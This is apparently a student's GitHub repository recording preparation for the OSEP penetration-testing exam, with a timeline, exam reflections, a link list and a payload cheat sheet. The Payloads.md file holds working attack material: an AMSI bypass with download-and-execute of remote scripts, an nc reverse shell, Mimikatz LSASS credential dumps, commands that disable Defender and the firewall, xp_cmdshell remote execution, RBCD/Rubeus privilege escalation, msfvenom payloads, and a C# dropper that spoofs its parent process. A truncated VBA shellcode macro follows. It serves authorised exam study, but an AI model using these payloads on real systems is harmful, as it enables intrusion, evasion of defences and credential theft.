```
├── .gitignore
├── Exam 2.0.md
├── README.md
├── Timeline.md
├── Useful Resources
│   ├── Links.md
│   ├── Payloads.md
│   └── Tools.md
└── images
    └── Default.png
```

/.gitignore:
--------------------------------------------------------------------------------
.obsidian
--------------------------------------------------------------------------------

/Exam 2.0.md:
--------------------------------------------------------------------------------
# D Day - 02
---
## Offsec were kind enough to let me retake my exam without the cooldown period of 1 month (will not disclose the reason). I am thankful to Offsec for letting me retake quickly.

---
## Prep after first fail
- Only one prep: went through Google to learn more about the path where I got stuck, got some leads, time to test them in the exam. It worked.
- Really nothing else: no labs, no extension, no blogs.
---
## The Exam
- The exam was a breeze; got the minimum required flags well under time and had lots of time to go through various methods and test my hypotheses.
- Did I get secret.txt?
  - Unfortunately, noooooooo.
- How close was I?
  - I guess just one hop away. Not 100% sure, as I could see the box.
- I had more flags than the 10 required.
- Will I take the exam again to get to secret.txt?
  - Yes. Someone pay for my retest XD.
- Was the exam environment stable?
  - Yes.
  - But after a reset, I don't know why, the initial payload didn't work; I had to reset again to exploit it, and then it worked like a charm. This happened only once.
  - Had to trigger the payload multiple times; maybe it is by design.
  - Nothing is broken. Yes, nothing is broken. I initially thought the same, but later figured out it was not broken. Like OSCP, you have to tweak your payloads a little to get execution.
---
Offsec clearly states in its FAQ:
```
The exam consists of one large network with multiple machines that must be compromised.
As the exam network simulates a corporate network, you will have to first obtain a foothold and then perform additional internal attacks. There are multiple attack paths through the network that will result in the same level of compromise.

Some of the machines will require multiple exploitation steps, resulting first in low-level local access, and then in root or administrative privilege escalation. Other machines will be fully exploitable remotely.

While we cover a number of more advanced techniques in this course, foundational attack components are also part of the exam.

Specific instructions for your target network will be located in your Exam Control Panel, which will only become available to you once your exam begins.
```

With the above FAQ, one shouldn't really struggle with the exam, although I made some silly mistakes (we all do at some stage, nothing to be ashamed of).
- Yes, there is more than one way to compromise / get a foothold.
- `While we cover a number of more advanced techniques in this course, foundational attack components are also part of the exam.`
  - I want to stress this line more because I saw people complain about certain vectors.
  - Do not forget your fundamentals; you learnt this in OSCP. Use the same tricks.
  - Do not call this out of syllabus. It is nothing difficult; you would have done the same tricks in the OSCP labs and exam. Use the same skill set here.
  - Google whatever you don't understand. I believe you should know how to google the little pieces of information available to you => follow the path => connect the dots => you have what you need. Go get that shell.
- You don't need to compromise every machine to pass. Just go with the flow of where the exploitation and enumeration leads you.
---
## My review of Exam
- The foothold was similar to the lab, nothing new.
- Pivoting was also similar to the labs.
- Does the lab and PDF cover what is required for the exam?
  - Yes and no.
  - No: like OSCP, no exact copy-paste of the techniques. I felt the labs could have been a little more complex w.r.t. the payloads crafted in the exam.
  - Don't be discouraged by the above point. You will be able to figure out the solutions when you're stuck; just take a break and start from scratch with the details you have.
- Do you need other labs and courses?
  - No. I had zero experience w.r.t. AD and Defender evasion.
  - W.r.t. learning, please do refer to other resources, as some techniques are better explained and simpler to use when compared with the PDF and videos.
  - It is an advantage, as you will learn new topics and methods which you can implement in the exam.
- Keep backup payloads. I recommend keeping at least one good payload to get RCE even if you don't get a shell.
- Take breaks. It is doable; don't lose focus.
---
--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
# My journey and story so far
---
# Intro:
---
I am a Master's student in information security, with a keen interest in infrastructure security. Worked as an intern, volunteer and freelancer for a couple of companies. Participated in CTFs, solved boxes on HTB, TryHackMe, Proving Grounds, etc. I would design home labs to test and practice, but never worked with Active Directory prior to OSEP. I got my OSCP in February 2021, and did not work anywhere or practice as I was focusing on my master's application and preparing to move out. I jumped directly into OSEP in November and, as time goes by, I am here writing my post-OSEP experience. Everybody has their own path and experience.

Here is mine.........

---
## The Main part
1. [Timeline](Timeline.md)
2. [Links](/Useful%20Resources/Links.md)
3. [Tools](/Useful%20Resources/Tools.md)
4. [Payloads](/Useful%20Resources/Payloads.md)
5. [Exam 2.0](Exam%202.0.md)
--------------------------------------------------------------------------------

/Timeline.md:
--------------------------------------------------------------------------------
# Timeline
---
## TL;DR: Contains the timeline and flow of my preparation, not in detail with payloads and methods
Every payload and method will be updated when I pass my `EXAM`.
---
## Day 1:
---
Got access on November 4th, 2021 => download all files => start reading from the start.

Looking at the topics, I could feel the major upgrade from OSCP to OSEP. I was impressed with the course content.
Decided to study the PDF first => videos => lab.
Spent the day glancing at the topics and trying to rate my knowledge of each topic.
Decided to spend two days, one each for the PDF and videos.

---

## Day 2 to Day 4:
---
Theory of Client Side Code Execution with Office.
I was familiar with using VBA, but the course did have some very in-depth content which I found really interesting. Understood that the key point is to keep it in memory, and preferred to use a staged payload, as the dropper size can be reduced and the detection rate is low. Some of the topic was mainly about code execution post dropper, but it did not deal with AV/Defender bypass as yet. Simple topic; shouldn't take much time if you know about macros already.

---

## Day 5 to Day 7
---
### Theory of Client Side Code Execution With Windows Script Host
The flow was similar to that of the macros:
Dropper => Staged Payload => In-memory execution using a PowerShell or C# payload.
Introduction to DotNetToJscript and SharpShooter; although most AV detect the payload now, you can still play around with it.
.js files are by default executed by Windows, so we don't have to worry about explicitly calling them through an app.
![](/images/Default.png?raw=true)

---

## Day 8 to Day 9
---
### Process Injection and Migration.
Been used to Meterpreter doing these steps, so we take them for granted.
I really enjoyed reading this part, as there was a step-by-step description in theory and video, and I appreciate OFFSEC for explaining the basic steps so neatly.
Worth the time spent here. Has C# and PowerShell payloads described in here.

---

## Day 10 to Day 14
---
### AV evasion
As the topic says, AV evasion.
This topic is where you have to focus a lot, as the labs have Defender and AV on them. Especially AMSI bypass, as you're gonna need it almost every time you try to get code exec. A couple of straightforward methods are described in the PDF; you're free to use yours (I recommend keeping backup scripts). Since the course has been out, students have been successful in submitting samples to the AV vendors, which leads to detection of our payload. To not worry/panic during the lab/exam, please prepare your own script; even a slight modification in the dropper code is sometimes enough to bypass some AV, so obfuscation is really important. It shows the payload generation for macros, C# and PowerShell. So this is one of the important topics.

On Day 11, I started Lab 1. Took a couple of days to actually understand, as I was stuck on it with the OSCP mindset of getting a foothold => user shell => priv shell. But that is not the aim here. Our target is the DC, so focus more on pivoting and AD. To try and test your code, you are provided with a test Win 10 VM, but I would recommend having your own VM for testing.

**NOTE**
`Please disable Windows Defender and any other AV you have installed on your host while testing. If you're using a shared directory on your Windows host, please make sure you add the shared directory to the whitelist or ignore list and disable sample submission in your Defender. I would recommend disabling NAT/bridged mode networking on the test VM, preventing it from accessing the internet.`

I had to refer to Application Whitelisting, as we are gonna use AMSI bypass together with CLM bypass, so get a good payload ready for your exam.

---
## Day 15 and Day 16
---
Still stuck on Lab 1. Trying to understand pivot paths; basic Active Directory introduction in here. There will be occasional jumps between topics like AV bypass, AD, process injection, etc. So it was a good run between multiple topics. The focus here is on trying to reach the DC as soon as possible. Check if you can priv esc quickly, else find a path, creds or any info from AD enum to pivot into the next IP.
**Focus on Movement**
PowerView, BloodHound and Metasploit are your best friends in the lab. Get the hang of them.
Lab 2 was a breeze; the PDF is more than enough for you guys, a couple of hours and you're done.
Lab 3 was interesting. It's like every lab covers a part of the PDF, so not trying the individual modules in practice will definitely consume more time while solving the labs, but you are free to experiment yourself.

---
### NEED A BREAK FOR A COUPLE OF DAYS, TOO HECTIC A SCHEDULE FROM THE START OF THE LABS
I am a university student, juggling between classes and OSEP and other stuff.

---
## Day 19
---
I shift my focus onto labs only for now; will refer to the PDF and notes when required.
Lab 4 sets the path towards the exam. 3 days to get all flags; now I realize my AD needs some serious work.


---
## Day 23
Lab 5 was weird w.r.t. starting the lab; I had to revert the lab thrice to get the machine to spawn. I'm on day 26, just a couple more boxes left.
This was some real pivoting and AD, and I guess I have an expectation of what Lab 6 holds, which OFFSEC says is as close as it gets to the exam. I would like to solve it without any nudges.

---

## Day 26
---
Done with Lab 5. Kind of tricky, but AD is really important.

---

## Day 27
---
Starting Lab 6. Took a week to understand a lot of stuff; some things were new, some assumptions, some classic misconfigs.
As much as I wanted to solve it without hints, I had to rely on some pointers to figure it out. Kinda sad, but worth it, as I learned some new tricks and accessed some good repos which were really useful w.r.t. the exam.

---

## Day 34
---
All labs done. Took quite a long break, for 10 days.

---

## Day 45
---
Refreshing through all labs, rechecking all payloads and stuff.
Found some really nice code for the dropper, and finally managed 0 detections in static analysis.
I feel confident enough to schedule the exam on Jan 2nd.

---

## Day 53 to Exam Day
---
What happens when you are way too optimistic: you end up with Covid right after Boxing Day.
A sane person would have rescheduled his exam, but not me; I was way too optimistic and eager to finish the exam, and didn't reschedule.
Biggest mistake:
```
Never take any exam/task right after recovery or when you feel recovered after illness. The medications make you drowsy and hamper your thinking ability.
```

---

# Exam Day
---
Nothing works according to plan.
- Payload fails.
- Initial enum is $#!&.
- Medicines making me drowsy.
- My brain is not working.

24 hours in and only one flag, which made me question my skills. A simple priv esc didn't work and the panic set in.

Mistakes:
- No breaks.
- Didn't focus on having my food at the right time.
- Panicked.
- Lack of sleep.

Decided to take a long break. Slept and started again.
Got 4 more flags pretty quickly. High on confidence now, until I hit a roadblock and lost my mind again. Finally, with some sense in my head, I decided to quit the exam and focus on my mental and physical health.
A good decision, as I needed a couple more days to recover completely.

---
```
I failed the exam. Not at all happy, and a poor start to the year; very depressed.
```

Positives from the experience:
- I can work under stress; not the optimal result, but I can withstand pressure and perform tasks.
- Understood the importance of good health and breaks (should have known about breaks from the OSCP exam; -_- ).
- Can think and analyze out of the box and restart the task from basics to succeed.

---
--------------------------------------------------------------------------------

/Useful Resources/Links.md:
--------------------------------------------------------------------------------
# Quick Links to Refer
## Below are some of the links that have done the work so far in my labs; will be updating this as I progress
---

1. [Quick Payloads](https://github.com/chvancooten/OSEP-Code-Snippets)
2. [Study Links](https://github.com/nullg0re/Experienced-Pentester-OSEP)
3. [AMSI Obfuscator](https://amsi.fail/)
4. [Red Team Scripts](https://github.com/BankSecurity/Red_Team)
5. [Red Team Scripts 2](https://github.com/an4kein/awesome-red-teaming)
6. [LOLBAS](https://lolbas-project.github.io/)
7. [LOLBAS-like AD suggester](https://wadcoms.github.io/)
8. [Red Team Experiments](https://www.ired.team/)
9. [TurtleToolKit](https://github.com/latortuga71/TortugaToolKit)
10. [Hacktricks](https://book.hacktricks.xyz/)
11. [Windows Priv Esc](https://guif.re/windowseop)
12. [Mimikatz Cheat Sheet](https://adsecurity.org/?page_id=1821)
13. [AD Quick Reference](https://www.thehacker.recipes/)
14. [Infosec Reference](https://rmusser.net/docs/index.html#/)
15. [AD Cheat Sheet](https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference/) `I like this personally`
16. [AMSI Bypass](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
17. [AMSI Bypass Manual Method](https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/)
18. [S3cur3Th1sSh1t Github](https://github.com/S3cur3Th1sSh1t)
19. [Octoberfest7 Github](https://github.com/Octoberfest7)

--------------------------------------------------------------------------------

/Useful Resources/Payloads.md:
--------------------------------------------------------------------------------
# Quick commands to work with
### Will update as I refine and play around with it. Do explore other commands; some may be faster and easier than the ones below.
### This is by no way a silver bullet. A lot of payloads have not been added; these are just a few. Please refer to the links and explore more. Do not copy-paste; you will not learn anything.
---
### Disable Defender and firewall
```
Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true
NetSh Advfirewall set allprofiles state off
```
---
### Mimikatz
```
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
---
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::secrets" "exit"
---
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::sam /patch" "exit"
---
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::lsa /patch" "exit"
---
mimikatz.exe "privilege::debug" "!+" "!processprotect /process:lsass.exe /remove" "lsadump::lsa /inject /name:kerberos" "exit"
---
mimikatz.exe "kerberos::golden /user:Administrator /domain:final.com /sid: /krbtgt: /sids: /ptt" "exit"

---
```
---
### Rubeus
```
NT hash for given password (Required for S4U)
Rubeus.exe hash /password:Summer2018!

S4U
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/ /ptt

```
---
### Powershell
---
#### AMSI bypass and Code Exec
```
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);

(New-Object System.Net.WebClient).DownloadString('http://192.168.x.x/*.ps1')| IEX;
```
---
#### Remoting
```
Invoke-command -computername -scriptblock { c:\windows\tasks\nc.exe 192.168.x.x 443 -e cmd.exe}
```
---
#### RBCD
```

New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer -Identity | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

.\Rubeus.exe hash /password:Summer2018!

.\Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:administrator /msdsspn:cifs/ /ptt
```
---
#### SharpHound
```
(New-Object System.Net.WebClient).DownloadString('http://192.168.x.x/SharpHound.ps1') | IEX; Invoke-BloodHound -CollectionMethod All -domain

```
---
---
### SQL
```
mssqlclient.py @ -hashes : -windows-auth
mssqlclient.py :@ -windows-auth
---
EXECUTE as LOGIN = 'sa';EXEC sp_serveroption '', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT ;EXEC('xp_cmdshell ''whoami'';') AT
---
EXEC('xp_cmdshell ''powershell -c "iex (iwr -UseBasicParsing http://192.168.x.x/test.txt)'' ') AT ;
---
proxychains ntlmrelayx.py --no-http-server -smb2support -t
---
EXECUTE ('master.sys.xp_dirtree "\\\a"')

exec ('execute as login =''user'';EXEC (''sp_configure ''''show advanced options'''', 1; RECONFIGURE; EXEC sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'') AT server1') AT server2

exec ('execute as login =''user'';EXEC (''xp_cmdshell ''''whoami'''' '') AT server1') AT server2
```
---
### PSexec
---
#### With hash / password
```
psexec.py -no-pass -hashes /@
psexec.py /:@
```
---
#### Importing ticket and gaining shell
```
getST.py -spn CIFS/ -impersonate '' -ts /attackersystem\$:'' -dc-ip
OR
ticketer.py -domain-sid -nthash -domain -spn cifs/

export KRB5CCNAME=/tmp/administrator.ccache
psexec.py user@IP -k -no-pass

Note:
If facing issues with tickets, try editing the spn
example: -spn CIFS/box1.domain.local as -spn CIFS/box1
```
---
### Evil-WinRM
```
evil-winrm -u \\ -H -i
```
---
### Impacket
---
```
secretsdump.py /:@

ticketConverter.py win_format lin_format
```
---
### MSF
```
sudo msfconsole -qx "use exploit/multi/handler ;set payload windows/meterpreter/reverse_tcp; set lhost tun0; set lport 4444;exploit;"
sudo msfconsole -qx "use exploit/multi/handler ;set payload linux/x86/meterpreter/reverse_tcp; set lhost tun0; set lport 4444;exploit;"
autorun
set autoroute 'route 172.16.x.0/24';
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.x.x lport=4444 -f exe -o 4444.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.x.x lport=4444 -f elf -o lin-4444
```
---
### CrackmapExec
```
proxychains crackmapexec smb -u \ -H
proxychains crackmapexec smb -u -p
```

---
## C# payload
```
Original payloads copied from
https://github.com/leoloobeek/csharp/blob/master/ExecutionTesting.cs
https://0x1.gitlab.io/pentesting/Defcon27-Csharp-Workshop/
```
```
using System;
using System.Text;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
using System.IO;
using System.Diagnostics;
using System.Threading;

namespace Dropper
{
    class Program
    {
        static void Main(string[] args)
        {
            string command;
            int newParentProcId;

            // Use a running notepad.exe (start one if needed) as the parent the child will be attributed to
            Process[] expProc = Process.GetProcessesByName("notepad");
            if (expProc.Length == 0)
            {
                Process.Start("notepad.exe");
                Thread.Sleep(2000);
                expProc = Process.GetProcessesByName("notepad");
            }
            newParentProcId = expProc[0].Id;

            // Modify the below to execute something else.
            if (args.Length != 1)
            {
                command = "powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('')) | iex";
                UnmanagedExecute.CreateProcess(newParentProcId, command);
                System.Environment.Exit(1);
                return;
            }

            command = "powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('" + args[0] + "')) | iex";
            Console.WriteLine("executing");
            UnmanagedExecute.CreateProcess(newParentProcId, command);
        }
    }

    class UnmanagedExecute
    {
        [DllImport("kernel32.dll")]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool CreateProcess(
            string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes,
            ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags,
            IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUPINFOEX lpStartupInfo,
            out PROCESS_INFORMATION lpProcessInformation);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr OpenProcess(ProcessAccessFlags processAccess, bool bInheritHandle, int processId);

        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern UInt32 WaitForSingleObject(IntPtr handle, UInt32 milliseconds);

        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UpdateProcThreadAttribute(
            IntPtr lpAttributeList, uint dwFlags, IntPtr Attribute, IntPtr lpValue,
            IntPtr cbSize, IntPtr lpPreviousValue, IntPtr lpReturnSize);

        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool InitializeProcThreadAttributeList(
            IntPtr lpAttributeList, int dwAttributeCount, int dwFlags, ref IntPtr lpSize);

        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool DeleteProcThreadAttributeList(IntPtr lpAttributeList);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool SetHandleInformation(IntPtr hObject, HANDLE_FLAGS dwMask, HANDLE_FLAGS dwFlags);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool PeekNamedPipe(IntPtr handle,
            IntPtr buffer, IntPtr nBufferSize, IntPtr bytesRead,
            ref uint bytesAvail, IntPtr BytesLeftThisMessage);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CloseHandle(IntPtr hObject);

        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool DuplicateHandle(IntPtr hSourceProcessHandle,
            IntPtr hSourceHandle, IntPtr hTargetProcessHandle, ref IntPtr lpTargetHandle,
            uint dwDesiredAccess, [MarshalAs(UnmanagedType.Bool)] bool bInheritHandle, uint dwOptions);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        public static extern int GetConsoleOutputCP();

        [DllImport("kernel32.dll")]
        static extern bool CreatePipe(out IntPtr hReadPipe, out IntPtr hWritePipe,
            ref SECURITY_ATTRIBUTES lpPipeAttributes, uint nSize);

        public static bool CreateProcess(int parentProcessId, string command)
        {
            // STARTUPINFOEX members
            const int PROC_THREAD_ATTRIBUTE_PARENT_PROCESS = 0x00020000;
            const int PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = 0x00020007;

            // Block non-Microsoft signed DLLs
            const long PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON = 0x100000000000;

            // STARTUPINFO members (dwFlags and wShowWindow)
            const int STARTF_USESTDHANDLES = 0x00000100;
            const int STARTF_USESHOWWINDOW = 0x00000001;
            const short SW_HIDE = 0x0000;

            // dwCreationFlags
            const uint EXTENDED_STARTUPINFO_PRESENT = 0x00080000;
            const uint CREATE_NO_WINDOW = 0x08000000;

            // WaitForSingleObject INFINITE
            const UInt32 INFINITE = 0xFFFFFFFF;
            var error = Marshal.GetLastWin32Error();

            // DuplicateHandle
            const uint DUPLICATE_CLOSE_SOURCE = 0x00000001;
            const uint DUPLICATE_SAME_ACCESS = 0x00000002;

            // https://msdn.microsoft.com/en-us/library/ms682499(VS.85).aspx
            // Handle stuff
            var saHandles = new SECURITY_ATTRIBUTES();
            saHandles.nLength = Marshal.SizeOf(saHandles);
            saHandles.bInheritHandle = true;
            saHandles.lpSecurityDescriptor = IntPtr.Zero;

            IntPtr hStdOutRead;
            IntPtr hStdOutWrite;
            // Duplicate handle created just in case
            IntPtr hDupStdOutWrite = IntPtr.Zero;

            // Create the pipe and make sure read is not inheritable
            CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 0);
            SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0);

            var pInfo = new PROCESS_INFORMATION();
            var siEx = new STARTUPINFOEX();

            // Be sure to set the cb member of the STARTUPINFO structure to sizeof(STARTUPINFOEX).
            siEx.StartupInfo.cb = Marshal.SizeOf(siEx);
            IntPtr lpValueProc = IntPtr.Zero;
            IntPtr lpMitigationPolicy = IntPtr.Zero;
            IntPtr hSourceProcessHandle = IntPtr.Zero;

            // Values will be overwritten if parentProcessId > 0
            siEx.StartupInfo.hStdError = hStdOutWrite;
            siEx.StartupInfo.hStdOutput = hStdOutWrite;

            try
            {
                if (parentProcessId > 0)
                {
                    // First call is expected to fail and report the size the attribute list needs
                    var lpSize = IntPtr.Zero;
                    var success = InitializeProcThreadAttributeList(IntPtr.Zero, 2, 0, ref lpSize);
                    if (success || lpSize == IntPtr.Zero)
                    {
                        return false;
                    }

                    siEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);
                    success = InitializeProcThreadAttributeList(siEx.lpAttributeList, 2, 0, ref lpSize);
                    if (!success)
                    {
                        return false;
                    }

                    // The mitigation policy is a 64-bit value, so allocate 8 bytes regardless of IntPtr.Size
                    lpMitigationPolicy = Marshal.AllocHGlobal(sizeof(long));
                    Marshal.WriteInt64(lpMitigationPolicy, PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON);

                    // Add Microsoft-only DLL protection
                    success = UpdateProcThreadAttribute(
                        siEx.lpAttributeList,
                        0,
                        (IntPtr)PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY,
                        lpMitigationPolicy,
                        (IntPtr)sizeof(long),
                        IntPtr.Zero,
                        IntPtr.Zero);
                    if (!success)
                    {
                        Console.WriteLine("[!] Failed to set process mitigation policy");
                        return false;
                    }

                    IntPtr parentHandle = OpenProcess(ProcessAccessFlags.CreateProcess | ProcessAccessFlags.DuplicateHandle, false, parentProcessId);
                    // This value should persist until the attribute list is destroyed using the DeleteProcThreadAttributeList function
                    lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);
                    Marshal.WriteIntPtr(lpValueProc, parentHandle);

                    success = UpdateProcThreadAttribute(
                        siEx.lpAttributeList,
                        0,
                        (IntPtr)PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
                        lpValueProc,
                        (IntPtr)IntPtr.Size,
                        IntPtr.Zero,
                        IntPtr.Zero);
                    if (!success)
                    {
                        return false;
                    }

                    // The child inherits handles from the new parent, so the pipe's write end must live there
                    IntPtr hCurrent = System.Diagnostics.Process.GetCurrentProcess().Handle;
                    IntPtr hNewParent = OpenProcess(ProcessAccessFlags.DuplicateHandle, true, parentProcessId);

                    success = DuplicateHandle(hCurrent, hStdOutWrite, hNewParent, ref hDupStdOutWrite, 0, true, DUPLICATE_CLOSE_SOURCE | DUPLICATE_SAME_ACCESS);
                    if (!success)
                    {
                        error = Marshal.GetLastWin32Error();
                        return false;
                    }

                    error = Marshal.GetLastWin32Error();
                    siEx.StartupInfo.hStdError = hDupStdOutWrite;
                    siEx.StartupInfo.hStdOutput = hDupStdOutWrite;
                }

                siEx.StartupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
                siEx.StartupInfo.wShowWindow = SW_HIDE;

                var ps = new SECURITY_ATTRIBUTES();
                var ts = new SECURITY_ATTRIBUTES();
                ps.nLength = Marshal.SizeOf(ps);
                ts.nLength = Marshal.SizeOf(ts);
                bool ret = CreateProcess(null, command, ref ps, ref ts, true, EXTENDED_STARTUPINFO_PRESENT | CREATE_NO_WINDOW, IntPtr.Zero, null, ref siEx, out pInfo);
                if (!ret)
                {
                    Console.WriteLine("[!] Process failed to execute!");
                    return false;
                }
                SafeFileHandle safeHandle = new SafeFileHandle(hStdOutRead, false);
                var encoding = Encoding.GetEncoding(GetConsoleOutputCP());
                var reader = new StreamReader(new FileStream(safeHandle, FileAccess.Read, 4096, false), encoding, true);
                string result = "";
                bool exit = false;
                try
                {
                    do
                    {
                        if (WaitForSingleObject(pInfo.hProcess, 100) == 0)
                        {
                            exit = true;
                        }

                        char[] buf = null;
                        int bytesRead;

                        uint bytesToRead = 0;

                        bool peekRet = PeekNamedPipe(hStdOutRead, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref bytesToRead, IntPtr.Zero);

                        // A failed peek means the pipe is gone; stop instead of spinning forever
                        if (!peekRet)
                        {
                            break;
                        }

                        if (bytesToRead == 0)
                        {
                            if (exit == true)
                            {
                                Console.WriteLine("Command executed.");
                                break;
                            }
                            else
                            {
                                continue;
                            }
                        }

                        if (bytesToRead > 4096)
                            bytesToRead = 4096;

                        buf = new char[bytesToRead];
                        bytesRead = reader.Read(buf, 0, buf.Length);
                        if (bytesRead > 0)
                        {
                            // Only append the characters actually read, not the whole buffer
                            result += new string(buf, 0, bytesRead);
                        }

                    } while (true);
                    reader.Close();
                }
                finally
                {
                    if (!safeHandle.IsClosed)
                    {
                        safeHandle.Close();
                    }
                }

                if (hStdOutRead != IntPtr.Zero)
                {
                    CloseHandle(hStdOutRead);
                }
                Console.WriteLine(result);
                return true;
            }
            finally
            {
                // Free the attribute list
                if (siEx.lpAttributeList != IntPtr.Zero)
                {
                    DeleteProcThreadAttributeList(siEx.lpAttributeList);
                    Marshal.FreeHGlobal(siEx.lpAttributeList);
                }
                Marshal.FreeHGlobal(lpValueProc);
                Marshal.FreeHGlobal(lpMitigationPolicy);

                // Close process and thread handles
                if (pInfo.hProcess != IntPtr.Zero)
                {
                    CloseHandle(pInfo.hProcess);
                }
                if (pInfo.hThread != IntPtr.Zero)
                {
                    CloseHandle(pInfo.hThread);
                }
            }
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        struct STARTUPINFOEX
        {
            public STARTUPINFO StartupInfo;
            public IntPtr lpAttributeList;
        }

        [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
        struct STARTUPINFO
        {
            public Int32 cb;
            public string lpReserved;
            public string lpDesktop;
            public string lpTitle;
            public Int32 dwX;
            public Int32 dwY;
            public Int32 dwXSize;
            public Int32 dwYSize;
            public Int32 dwXCountChars;
            public Int32 dwYCountChars;
            public Int32 dwFillAttribute;
            public Int32 dwFlags;
            public Int16 wShowWindow;
            public Int16 cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        [StructLayout(LayoutKind.Sequential)]
        internal struct PROCESS_INFORMATION
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public int dwProcessId;
            public int dwThreadId;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct SECURITY_ATTRIBUTES
        {
            public int nLength;
            public IntPtr lpSecurityDescriptor;
            [MarshalAs(UnmanagedType.Bool)]
            public bool bInheritHandle;
        }

        [Flags]
        public enum ProcessAccessFlags : uint
        {
            All = 0x001F0FFF,
            Terminate = 0x00000001,
            CreateThread = 0x00000002,
            VirtualMemoryOperation = 0x00000008,
            VirtualMemoryRead = 0x00000010,
            VirtualMemoryWrite = 0x00000020,
            DuplicateHandle = 0x00000040,
            CreateProcess = 0x000000080,
            SetQuota = 0x00000100,
            SetInformation = 0x00000200,
            QueryInformation = 0x00000400,
            QueryLimitedInformation = 0x00001000,
            Synchronize = 0x00100000
        }

        [Flags]
        enum HANDLE_FLAGS : uint
        {
            None = 0,
            INHERIT = 1,
            PROTECT_FROM_CLOSE = 2
        }

        [Flags]
        public enum DuplicateOptions : uint
        {
            DUPLICATE_CLOSE_SOURCE = 0x00000001,
            DUPLICATE_SAME_ACCESS = 0x00000002
        }
    }
}
```
---
## Macro

```
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Private Declare PtrSafe Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As LongPtr, lpParameter As Long, ByVal dwCreationFlags As Long, lpThreadId As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "KERNEL32" (ByVal destAddr As LongPtr, ByRef sourceAddr As Any, ByVal length As Long) As LongPtr
